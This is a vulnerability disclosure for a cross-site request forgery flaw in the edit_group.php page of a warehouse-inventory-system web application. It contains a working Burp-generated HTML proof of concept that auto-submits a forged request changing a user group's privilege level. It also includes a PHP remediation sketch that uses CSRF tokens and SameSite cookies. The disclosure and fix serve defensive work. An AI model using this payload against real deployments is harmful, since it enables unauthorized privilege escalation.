[Description]
warehouse-inventory-system was discovered to contain a cross-site request forgery (CSRF) vulnerability via the URI /edit_group.php.
[Vulnerability Type]
Cross-site request forgery (CSRF)
[Vendor of Product]
OSWAPP, https://github.com/siamon123/warehouse-inventory-system
[Affected Product Code Base]
V2.0
[Impact Escalation of Privileges]
true
[POC]
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.0.183:11180/edit_group.php?id=4" method="POST">
<input type="hidden" name="group-name" value="Test2" />
<input type="hidden" name="group-level" value="5" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="update" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
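
The forged form above carries only the group fields and no value that another site could not predict, so a per-session token checked before the update is the usual fix. The sketch below is an added example, not code from warehouse-inventory-system; the helper names csrf_token() and csrf_check(), the csrf_token field name and the form markup are assumptions, and only the field names group-name, group-level, status and update come from the PoC.

```php
<?php
// Added example: hypothetical hardening for a handler shaped like edit_group.php.
// SameSite=Lax keeps the session cookie off cross-site POSTs (PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted value is a string equal to the session token.
function csrf_check($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted)
        && hash_equals($expected, $submitted); // constant-time comparison
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['update'])) {
    // The PoC's POST has no csrf_token field, so it stops here with a 403.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The existing group update (group-name, group-level, status) runs only past this point.
}
?>
<!-- Illustrative form: the legitimate page embeds the token in every state-changing form. -->
<form method="post" action="edit_group.php?id=<?= (int)($_GET['id'] ?? 0) ?>">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="group-name">
  <input type="number" name="group-level">
  <input type="text" name="status">
  <button type="submit" name="update">Update</button>
</form>
```

The same check has to sit in front of every other state-changing endpoint of the application, since the token protects only the handlers that verify it.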